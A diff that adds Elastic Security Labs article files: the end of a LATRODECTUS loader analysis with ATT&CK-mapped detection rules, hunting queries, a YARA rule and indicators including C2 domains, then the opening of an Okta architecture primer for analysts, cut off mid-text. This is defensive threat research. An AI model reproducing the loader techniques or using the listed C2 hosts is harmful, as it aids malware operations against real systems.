|\n| [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/) | [Execution via a Suspicious WMI Client](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/initial_access_execution_via_a_suspicious_wmi_client.toml) | Javascript dropper invokes WMI to mount a WEBDAV share and invokes msiexec to install a remote msi file. |\n| [T1218.007 - Misexec](https://attack.mitre.org/techniques/T1218/007/) | [Remote File Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_remote_file_execution_via_msiexec.toml) [Suspicious MsiExec Child Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_suspicious_msiexec_child_process.toml) | MSI file hosted on remote Webdav and executed in quiet mode. Once executed it drops a DLL and launches rundll32 to load it via the Advanced installer viewer.exe binary. |\n| [T1218.011 - Rundll32](https://attack.mitre.org/techniques/T1218/011/) | [Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml) | Rundll32 loads the LATRODECTUS DLL from AppData and starts code injection. |\n| [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/) | [Memory Threat Detection Alert: Shellcode Injection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) [VirtualProtect API Call from an Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml) [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml) [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml) | Shellcode execution triggers 3 endpoint behavior alerts and a memory threat detection alert. |\n| [T1053.005 - Scheduled Task](https://attack.mitre.org/techniques/T1053/005/) | [Scheduled Task Creation by an Unusual Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/persistence_scheduled_task_creation_by_an_unusual_process.toml) | LATRODECTUS may persist using scheduled tasks (rundll32 will create a scheduled task). |\n| [T1070.004 - File Deletion](https://attack.mitre.org/techniques/T1070/004/) | [Potential Self Deletion of a Running Executable](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_potential_self_deletion_of_a_running_executable.toml) | Part of the malware DLL self update command and also when the DLL is not running from AppData, LATRODECTUS will delete itself while running and restart from the new path or running an updated version of itself leveraging [this technique](https://github.com/LloydLabs/delete-self-poc). |\n| [T1059.003 - Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) | [Command Shell Activity Started via RunDLL32](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_command_shell_activity_started_via_rundll32.toml) | LATRODECTUS Command ID (4) - Collect system information via a series of cmd.exe execution. |\n\nThe following list of hunts and detection queries can be used to detect LATRODECTUS post-exploitation commands focused on execution:\n\n**Rundll32 Download PE/DLL** (command handlers #12, #13 and #18): \n\n``` sql\nsequence by process.entity_id with maxspan=1s\n[file where event.action == \"creation\" and process.name : \"rundll32.exe\" and \n /* PE file header dropped to the InetCache folder */\nfile.Ext.header_bytes : \"4d5a*\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\"]\n[network where process.name : \"rundll32.exe\" and \n event.action : (\"disconnect_received\", \"connection_attempted\") and \n /* network disconnect activity to a public Ip address */\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\", \"192.168.0.0/16\")]\n```\n\n\n\n\nBelow is an ES|QL hunt to look for long-term and/or high count of network connections by rundll32 to a public IP address (which is uncommon): \n\n``` sql\nfrom logs-endpoint.events.network-*\n| where host.os.family == \"windows\" and event.category == \"network\" and\n network.direction == \"egress\" and process.name == \"rundll32.exe\" and\n/* excluding private IP ranges */\n not CIDR_MATCH(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\"FE80::/10\", \"FF00::/8\")\n| keep source.bytes, destination.address, process.name, process.entity_id, process.pid, @timestamp, host.name\n/* calc total duration and the number of connections per hour */\n| stats count_connections = count(*), start_time = min(@timestamp), end_time = max(@timestamp) by process.entity_id, process.pid, destination.address, process.name, host.name\n| eval duration = TO_DOUBLE(end_time)-TO_DOUBLE(start_time), duration_hours=TO_INT(duration/3600000), number_of_con_per_hour = (count_connections / duration_hours)\n| keep host.name, destination.address, process.name, process.pid, duration, duration_hours, number_of_con_per_hour, count_connections\n| where count_connections >= 100\n```\n\n\n\n\nBelow is a screenshot of Elastic Defend triggering on the LATRODECTUS [memory signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar): \n\n\n\n\n### YARA\n\nElastic Security has created YARA rules to identify [LATRODECTUS](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar):\n\n```\nrule Windows_Trojan_LATRODECTUS_841ff697 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-03-13\"\n last_modified = \"2024-04-05\"\n license = \"Elastic License v2\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.LATRODECTUS\"\n reference_sample = \"aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\"\n\n\n strings:\n $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 }\n $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 00 C3 }\n $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 00 B8 FF FF FF FF E9 A6 00 }\n $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44 24 44 83 7C 24 44 00 75 02 EB 11 48 8B 44 24 48 EB 0C 33 C0 85 C0 0F 85 10 FE FF FF 33 }\n $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC 24 D8 01 00 00 0D 74 18 83 BC 24 D8 01 00 00 0F 74 0E 83 BC 24 D8 01 00 00 04 0F 85 44 02 00 00 }\n $hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 }\n $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 89 44 24 ?? 33 C0 66 89 44 24 ?? EB ?? }\n $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01 89 04 24 EB BE }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| --- | --- | --- | --- |\n| aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c | SHA-256 | TRUFOS.DLL | LATRODECTUS |\n| aytobusesre.com | domain | | LATRODECTUS C2 |\n| scifimond.com | domain | | LATRODECTUS C2 |\n| gyxplonto.com | domain | | ICEDID C2 |\n| neaachar.com | domain | | ICEDID C2 |\n\n## References\nThe following were referenced throughout the above research:\n\n - [https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39)\n - [https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice)\n\n## Tooling\n[String decryption and IDA commenting tool](https://github.com/elastic/labs-releases/blob/main/tools/latrodectus/latro_str_decrypt.py)\n"
+ },
+ "title": "Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID",
+ "slug": "spring-cleaning-with-latrodectus",
+ "subtitle": "The LATRODECTUS loader evolves to deliver ICEDID and other malware",
+ "date": "2024-05-16",
+ "description": "Elastic Security Labs has observed an uptick in a recent emerging loader known as LATRODECTUS. This lightweight loader packs a big punch with ties to ICEDID and may turn into a possible replacement to fill the gap in the loader market.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 16.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "icedid",
+ "latrodectus",
+ "loader"
+ ]
+ },
+ "id": "security_labs_content-spring_cleaning_with_latrodectus-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json
new file mode 100644
index 00000000000..91376a98e76
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Starter guide to understanding Okta\"\nsubtitle: \"An introduction for security analysts\"\nslug: \"starter-guide-to-understanding-okta\"\ndate: \"2024-01-23\"\ndescription: \"This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-09.png\"\ncategory:\n - slug: security-research\n---\n\n# Preamble\nThe evolution of digital authentication from simple, unencrypted credentials to today’s advanced methods underscores the importance of data security. As organizations adapt to hybrid deployments and integral application access is no longer within the perimeter of a network, inherited authentication complexity and risk ensue. The adoption of standard authentication protocols and advanced workflows is mandatory to not only reduce risk but also maintain operational stability amongst users who require access to various applications. Okta provides solutions to these inherent industry problems with its comprehensive SaaS platform for Identity and Access Management (IAM) services.\n\nWe will examine Okta's services and solutions in the context of Software-as-a-Service (SaaS) platforms and against the backdrop of the broader threat landscape. We'll explore historical and potential vulnerabilities to understand their origins and impacts. This article will provide insights into:\n\n - Universal Directory (UD)\n - Data Model\n - API Access Management\n - Access Policies\n - Session Management\n - Tenants\n - Authorization Workflows\n - Authentication Workflows.\n\nWith a deeper understanding of Okta, security practitioners may leverage this knowledge to accurately assess attack surfaces where Okta is deployed.\n\n# Okta's offerings\n\n## Overview of core services\n\nIn this introduction, we delve into the core services provided by Okta. Primarily, Okta is a SaaS platform, specializing in scalable Identity and Access Management (IAM) solutions. Central to its offerings are technologies such as Single Sign-On (SSO), Multi-Factor Authentication (MFA), and support for complex multi-tenant architectures. Okta also boasts a robust suite of RESTful APIs, facilitating seamless Create, Read, Update, and Delete (CRUD) operations.\n\nAt the heart of Okta’s IAM solutions lie users, groups, and policies. The platform provides comprehensive lifecycle management and a UD, allowing seamless IAM across hybrid environments encompassing applications, devices, and more. This includes synchronization capabilities with external directories like LDAP or Active Directory (AD), ensuring a unified identity management system.\n\nA key aspect of Okta's service is its dual role as both a Service Provider (SP) and an Identity Provider (IdP). This dual functionality enables Okta to facilitate secure and seamless authentication via its [Identity Engine](https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-index.htm), and robust authorization using standard protocols such as OAuth, while also supporting authentication protocols such as Security Assertion Markup Language (SAML) and OpenID Connect (OIDC).\n\nFor customers, Okta offers valuable tools for security and compliance. [System logs](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/), environment-based events that are stored and retrievable via API, provide insights into user activities and organizational events. These logs are crucial for Security Information and Event Management (SIEM) systems, aiding in the detection of anomalies and potential threats.\n\nAdditionally, Okta's [ThreatInsight](https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm) feature stands out as a proactive security measure. It aggregates and analyzes system logs, dynamically identifying and responding to potential threats. This includes recognizing patterns indicative of malicious activities such as password spraying, credential stuffing, and detecting suspicious IP addresses. These features collectively enhance the security posture of organizations, fortifying them against a wide array of cyber threats.\n\n## Integration capabilities\n\nAside from some of the many offerings, Okta is very developer-friendly with various other SaaS solutions and applications. Out of the box, Okta contains an [integration network](https://www.okta.com/integrations/) that allows seamless integration with other applications such as Slack, Google Workspace, Office 365, GitHub, and many more.\n\nOkta’s [RESTful APIs](https://developer.okta.com/docs/reference/core-okta-api/) follow the System for Cross-domain Identity Management ([SCIM](https://datatracker.ietf.org/doc/html/rfc7644)) protocol. This allows for straightforward Create, Read, Update, and Delete (CRUD) operations on users and groups by applications or developers, but also enables standardization within the SaaS ecosystem. SCIM is a pivotal component of Okta's scalability. As businesses expand, the need to integrate an increasing number of users, groups, and access controls across various SaaS platforms grows. SCIM addresses this challenge by standardizing how user identity data is communicated between these platforms. This standardization facilitates the process of user management, especially in synchronizing user information across different systems.\n\nOkta’s object management regarding APIs is focused on several domains listed below:\n\n - Apps API - Manage applications and their association with users and groups.\n - Users API - CRUD operations on users.\n - Sessions API - Creates and manages user’s authentication sessions.\n - Policy API - Creates and manages settings such as a user’s session lifetime.\n - Factors API - Enroll, manage, and verify factors for MFA.\n - Devices API - Manage device identity and lifecycles.\n\nWhen integrations are added to an Okta organization, authentication policies, both fine-grained and global, can be set up for access control based on end-user attributes stored within the user’s Okta profile.\n\n# Universal directory\n\nAt the core of Okta’s user, group, policy, and device management is the [UD](https://www.okta.com/products/universal-directory). This is a single pane view of all assets, whether sourced from Okta, an integration, or a secondary directory service such as AD.\n\nThe UD is technically an Okta-managed, centralized, and cloud-based repository for all user, group, device, and policy profiles. Okta is either the source of truth regarding IAM or synchronizes with other federation services and identity providers such as AD or Google Workspace. The UD is accessible behind Okta’s core APIs for CRUD operations and used in conjunction with their single sign-on (SSO) platform, thus providing authentication and authorization to linked integrations or the admin console itself. Everything from user management to streamlined password management is enabled by the UD.\n\nIn conclusion, the UD classifies as a directory-as-a-service ([DaaS](https://jumpcloud.com/daas-glossary/directory-as-a-service-daas)), similar to AWS directory service, Microsoft’s Entra ID and many more.\n\n## Customization and management\n\nAdding a bit more depth to the UD, profile customization is accessible. This enables an organization to store a record of information regarding users and groups that contain specific attributes. Base attributes are assigned by Okta, but custom attributes can be added as well between user, group, and app [user profiles](https://developer.okta.com/docs/concepts/user-profiles/). Attribute mappings are important for synchronization and data exchanges between integrations and other directory services. For example, the AD attribute givenName can be mapped specifically to FirstName and LastName in Okta. Aside from synchronization, this is important for other Okta-related features such as [inline hooks](https://developer.okta.com/docs/concepts/inline-hooks/), directory rules and actions, and more.\n\nAdditionally, this enables rich SAML assertions and [WS-Federation](https://auth0.com/docs/authenticate/protocols/ws-fed-protocol) claims where applications can utilize this information to create rich user accounts, update accounts, or create complex authorization and authentication decisions.\n\nThere are additional [autonomous provisioning and deprovisioning](https://help.okta.com/en-us/content/topics/provisioning/lcm/con-okta-prov.htm) options available as well with the UD and internal profiles, important for scalability and administrative tasks such as controlling which user types can access which applications, thus enabling more traditional role-based access control (RBAC) policies.\n\n## Integration with external directories\n\nAs mentioned previously, the Okta [Directory Integration](https://www.okta.com/resources/whitepaper/ad-architecture/) can synchronize with external directories such as LDAP, AD, Google Workspace and others. For cloud-based DaaS platforms, Okta leverages RESTful APIs and the SCIM protocol to perform data exchanges and more. For on-premise environments, Okta has an AD [endpoint agent](https://help.okta.com/en-us/content/topics/directory/ad-agent-new-integration.htm) that can be deployed and thus pulls information from directory services and ships it back to the UD. \n\nAlternatively, Desktop SSO (DSSO) provides an [agentless](https://help.okta.com/en-us/content/topics/directory/configuring_agentless_sso.htm) option as well. This supplies flexibility to cloud, on-premise or hybrid based environments all while continuing scalability and direct integration with 3rd-party applications. Architecturally, this solves the many pitfalls of LAN-based environments, where applications are served to domain users behind a firewall. From a security perspective, credentials and profiles are then synchronized from all application directories into a single “source-of-truth”: Okta. It is much more approachable to audit a single directory as well in an instance where, for example, a disgruntled employee is no longer employed, and thus access across various applications must be deactivated. Single Log-Off ([SLO](https://help.okta.com/en-us/content/topics/apps/apps_single_logout.htm)) is thus available for such situations thanks to these external directory integration capabilities.\n\nFinally, we must not overlook the amount of maintenance this potentially reduces for organizations who may not have the resources to manage SAML, OAuth, and SCIM communications between RESTful APIs or compatibility issues between integrations as Okta manages this for them.\n\nAdditional solutions and examples of Okta providers with external directory support for AD can be found [here](https://www.okta.com/resources/whitepaper/ad-architecture/).\n\n# Data model\n\nAs we traverse through the Okta landscape, understanding Okta’s [data models](https://developer.okta.com/docs/concepts/okta-data-model/) is important to security practitioners who may be tasked with threat hunting, detection logic, and more.\n\n## Structure and design\n\nWhen Okta is first established for an organization, it inherits its own “space” where applications, directories, user profiles, authentication policies, and more are housed. A top-level directory resource is given as a “base” for your organization where entities can be sourced from Okta or externally (LDAP, AAD, Google Workspace, etc.).\n\nOkta users are higher-privileged users who typically leverage the Okta [admin console](https://help.okta.com/en-us/content/topics/dashboard/dashboard.htm) and perform administrative tasks, while end users are those who may rely on Okta for SSO, access to applications and more.\n\nBy default, entities in Okta are referred to as resources. Each resource has a combined set of default and custom attributes as discussed before. Links then describe relationships or actions that are acceptable for a resource, such as a deactivation link. This information is then aggregated into a profile which is then accessible from within the UD. Groups are made up of users more as a label to a specific set of users.\n\nApplications hold information about policies for access related to users and groups, as well as how to communicate with each integrated application. Together, the data stored about application access and related users is stored as an [AppUser](https://support.okta.com/help/s/article/The-Okta-User-Profile-And-Application-User-Profile?language=en_US) and if mapping is done correctly between directories, enables access for end users.\n\nA policy contains a set of conditions and rules that affect how an organization behaves with applications and users. Policies are all-encompassing in Okta, meaning they are used for making decisions and completing actions such as - what is required for a password reset or how to enroll in MFA. These rules can be expressed using the Okta Expression Language ([OEL](https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/)).\n\nDedicated [authorization servers](https://developer.okta.com/docs/concepts/auth-servers/) are used per organization to provide authorization codes and tokens for access to applications by API or resources. Here, authorization and authentication protocols such as OAuth, OIDC, and SAML are vital for workflows. These authorization servers are also responsible for communication with third-party IdPs such as Google Workspace. End users who may seek access to applications are entangled in communication between authorization servers and SPs as codes and tokens are exchanged rapidly to confirm authorization and authentication.\n\nAltogether, this structure and design support scalability, customization, and seamless integration.\n\n# API access management\n\nAPI access management is not only important for end users, administrators, and developers but also for integration-to-integration communication. Remember that at the forefront of Okta are its various RESTful [API endpoints](https://developer.okta.com/docs/reference/core-okta-api/#manage-okta-objects).\n\nWhile we won’t dive deep into the design principles and object management of Okta’s APIs, we will attempt to discuss core concepts that are important for understanding attack surfaces later in this blog series.\n\n## API Security\n\n### OAuth 2.0 and OIDC implementation\n\nUnderstanding the core protocols of [OAuth](https://auth0.com/docs/authenticate/protocols/oauth) and [OIDC](https://auth0.com/docs/authenticate/protocols/openid-connect-protocol) is key before exploring various authorization and authentication workflows. OAuth, an open standard for delegated authorization in RESTful APIs, operates over HTTPS, enabling secure, delegated access using access tokens instead of credentials. These tokens, cryptographically signed by the Identity Provider (IdP), establish a trust relationship, allowing applications to grant user access. The typical OAuth workflow involves user access requests, user authentication, proof-of-authorization code delivery, and token issuance for API requests. Access tokens are verified with the IdP to determine access scope.\n\nOIDC ([API endpoints](https://developer.okta.com/docs/reference/api/oidc/#endpoints)) builds upon OAuth for authentication, introducing identity-focused scopes and an ID token in addition to the access token. This token, a JSON Web Token ([JWT](https://developer.okta.com/blog/2020/12/21/beginners-guide-to-jwt)), contains identity information and a signature, crucial for SSO functionality and user authentication. Okta, as a certified OIDC provider, leverages these endpoints, especially when acting as an authorization server for Service Providers (SPs).\n\nDemonstrating Proof-of-Possession ([DPoP](https://developer.okta.com/docs/guides/dpop/main/#oauth-2-0-dpop-jwt-flow)) is crucial in this context, enhancing security by preventing misuse of stolen tokens through an application-level mechanism. It involves a public/private key pair where the public key, embedded in a JWT header, is sent to the authorization server. The server binds this public key to the access token, ensuring secure communication primarily between the user’s browser and the IdP or SP.\n\n[Tokens](https://developer.okta.com/docs/guides/tokens/) and API keys in Okta’s API Access Management play a vital role, acting as digital credentials post-user authentication. They are transmitted securely via HTTPS and have a limited lifespan, contributing to a scalable, stateless architecture.\n\nLastly, understanding End-to-End Encryption (E2EE) is essential. E2EE ensures that data is encrypted at its origin and decrypted only by the intended recipient, maintaining security and privacy across the ecosystem. This encryption, using asymmetric cryptography, is a default feature within Okta’s APIs, safeguarding data across applications, browsers, IdPs, and SPs.\n\n## RESTful API and CRUD\n\nOkta's RESTful API adheres to a standardized interface design, ensuring uniformity and predictability across all interactions. This design philosophy facilitates CRUD (Create, Read, Update, Delete) operations, making it intuitive for developers to work with Okta's API. Each [API endpoint](https://developer.okta.com/docs/reference/core-okta-api/) corresponds to standard HTTP methods — POST for creation, GET for reading, PUT for updating, and DELETE for removing resources. This alignment with HTTP standards simplifies integration and reduces the learning curve for new developers.\n\nA key feature of Okta providing a RESTful API is its statelessness — each request from client to server must contain all the information needed to understand and complete the request, independent of any previous requests. This approach enhances scalability, as it allows the server to quickly free resources and not retain session information between requests. The stateless nature of the API facilitates easier load balancing and redundancy, essential for maintaining high availability and performance even as demand scales.\n\n## SCIM\n\nSCIM (System for Cross-domain Identity Management) is an open standard that automates user identity management across various cloud-based applications and services. Integral to Okta's API Access Management, SCIM ensures seamless, secure user data exchange between Okta and external systems. It standardizes identity information, which is essential for organizations using multiple applications, reducing complexity and manual error risks.\n\nWithin Okta, SCIM’s role extends to comprehensive user and group management, handling essential attributes like usernames, emails, and group memberships. These are key for access control and authorization. Okta’s SCIM implementation is customizable, accommodating the diverse identity management needs of different systems. This adaptability streamlines identity management processes, making them more automated, efficient, and reliable - crucial for effective API access management.\n\nMore information on SCIM can be found in [RFC 7644](https://datatracker.ietf.org/doc/html/rfc7644) or by [Okta](https://developer.okta.com/docs/concepts/scim/#how-does-scim-work).\n\n## Access policies\n\nOkta's [access policies](https://developer.okta.com/docs/concepts/policies/) play a critical role in managing access to applications and APIs. They can be customized based on user/group membership, device, location, or time, and can enforce extra authentication steps for sensitive applications. These policies, stored as JSON in Okta, allow for:\n\n - Creating complex authorization rules.\n - Specifying additional authentication levels for Okta applications.\n - Managing user access and modifying access token scopes with inline hooks.\n\nKey Policy Types in Okta include:\n\n - *Sign-On Policies*: Control app access with IF/THEN rules based on context, like IP address.\n - *Global Session Policy*: Manages access to Okta, including factor challenges and session duration.\n - *Authentication Policy*: Sets extra authentication requirements for each application.\n - *Password Policy*: Defines password requirements and recovery operations.\n - *Authenticator Enrollment Policy*: Governs multifactor authentication method enrollment.\n \n Policy effectiveness hinges on their sequential evaluation, applying configurations when specified conditions are met. The evaluation varies between the AuthN and Identity Engine pipelines, with the latter considering both global session and specific authentication policies.\n\nAdditionally, [Network Zones](https://help.okta.com/en-us/content/topics/security/network/network-zones.htm) in Okta enhances access control by managing it based on user connection sources. These zones, allowing for configurations based on IP addresses and geolocations, integrate with access policies to enforce varied authentication requirements based on network origin. This integration bolsters security and aids in monitoring and threat assessment.\n\n# Session management\n\nIn web-based interactions involving Identity Providers (IdPs) like Okta and Service Providers (SPs), the concept of a session is central to the user experience and security framework. A session is typically initiated when an end-user starts an interaction with an IdP or SP via a web browser, whether this interaction is intentional or inadvertent.\n\nTechnically, a session represents a state of interaction between the user and the web service. Unlike a single request-response communication, a session persists over time, maintaining the user's state and context across multiple interactions. This persistence is crucial, as it allows the user to interact with web services without needing to authenticate for each action or request after the initial login.\n\nA session can hold a variety of important data, which is essential for maintaining the state and context of the user's interactions. This includes, but is not limited to:\n\n*Cookies*: These are used to store session identifiers and other user-specific information, allowing the web service to recognize the user across different requests.\n\n*Tokens*: Including access, refresh, and ID tokens, these are critical for authenticating and authorizing the user, and for maintaining the security of their interactions with the web service.\n\n*User Preferences and Settings*: Customizations or preferences set by the user during their interaction.\n\n*Session Expiration Data*: Information about when the session will expire or needs to be refreshed. This is vital for security, ensuring that sessions don’t remain active indefinitely, which could pose a security risk.\n\nThe management of sessions, particularly their creation, maintenance, and timely expiration is a crucial aspect of web-based services. Effective session management ensures a balance between user convenience — by reducing the need for repeated logins — and security — by minimizing the risk of unauthorized access through abandoned or excessively long-lived sessions. In the interactions between the end-user, IdP, and SP, sessions facilitate a seamless yet secure flow of requests and responses, underpinning the overall security and usability of the service.\n\n### Session initialization and authentication:\n\nOkta manages [user sessions](https://developer.okta.com/docs/concepts/session/) beginning with the IdP session, which is established when a user successfully authenticates using their credentials, and potentially multi-factor authentication (MFA). This IdP session is key to accessing various applications integrated into an organization's Okta environment. For instance, an HTTP POST request to Okta's ```/api/v1/authn``` endpoint initiates this session by validating the user's credentials. In addition, the [Sessions endpoint API](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/) can help facilitate creation and management at ```/api/v1/sessions```.\n\nOkta primarily uses cookies for session management, specifically in the context of identity provider (IdP) sessions. These cookies are crucial for maintaining the session state and user context across HTTP requests within the Okta environment. A typical session cookie retrieval for the end-user’s browser goes as follows:\n\n 1. IdP or SP-initiated application access request\n 2. Authentication request either via OIDC or SAML\n 3. After successful credential validation, a session token is returned\n 4. Redirection to OIDC endpoint, session redirection, or application embed link for session cookie\n\nAs detailed, when a user successfully authenticates, Okta ultimately sets a session cookie in the user’s browser. This cookie is then used to track the user session, allowing for seamless interaction with various applications without the need for re-authentication.\n\n### Tokens vs cookies:\n\nWhile Okta utilizes tokens like ID and access tokens for API access and authorization, these tokens serve a different purpose from session cookies. Tokens are typically used in API interactions and are not responsible for maintaining the user’s session state. In contrast, session cookies are specifically designed for maintaining session continuity within the web browser, making them essential for web-based SSO and session management within Okta.\n\nSession tokens are similar to client-side secrets, just like authorization codes during authorization requests. These secrets, along with the correct requests to specific API endpoints can allow an end-user, or adversary, to obtain a session cookie or access token which can then be used to make authenticated/authorized requests on behalf of the user. This should warrant increased security measures for session management and monitoring.\n\n### Single sign-on (SSO):\n\n[SSO](https://www.okta.com/blog/2021/02/single-sign-on-sso/) is a critical feature in Okta's session management, allowing users to access multiple applications with a single set of credentials. This is achieved through protocols like SAML and OIDC, where an HTTP(S) request to the SAML endpoint, for instance, facilitates user authentication and grants access across different applications without the need for repeated logins.\n\nIn Single Sign-On (SSO) scenarios, Okta’s session cookies play a vital role. Once a user is authenticated and a session is established, the same session cookie facilitates access to multiple applications within the SSO framework by bundled with every service provider request. This eliminates the need for the user to log in separately to each application, streamlining the user experience.\n\n### Session termination:\n\nTerminating a session in Okta can occur due to expiration. This can also occur from a user, SP, or IdP-initiated sign-out. An HTTP GET request to Okta's ```/api/v1/sessions/me``` endpoint can be used to terminate the user’s session. In the case of SSO, this termination can trigger a single logout (SLO), ending sessions across all accessed applications.\n\n### Application sessions and additional controls:\n\nApplication sessions are specific to the application a user accesses post-authentication with the IdP. Okta allows fine-grained control over these sessions, including different expiration policies for privileged versus non-privileged applications. Additionally, administrators can implement policies for single logout ([SLO](https://support.okta.com/help/s/article/What-SLO-does-and-doesnt-do?language=en_US)) or local logout to further manage session lifecycles.\n\nUnderstanding the mechanics of session initiation, management, and termination, as well as the role of tokens and cookies, is foundational for exploring deeper security topics. This knowledge is crucial when delving into areas like attack analysis and session hijacking, which will be discussed in later parts of this blog series.\n\nMore information on sessions can be found in [Session management with Okta](https://developer.okta.com/docs/concepts/session/#application-session) or [Sessions for Developers](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/).\n\n# Tenants\n\nIn the SaaS realm, a [tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) is a distinct instance of software and infrastructure serving a specific user group. In Okta's [multi-tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) platform, this concept is key for configuring access control. Tenants can represent various groups, from internal employees to external contractors, each requiring unique access to applications. This is managed through Okta, serving as the IdP.\n\nTenants are versatile within Okta: they can be tailored based on security policies, user groups, roles, and profiles, allowing them to operate independently within the organization. This independence 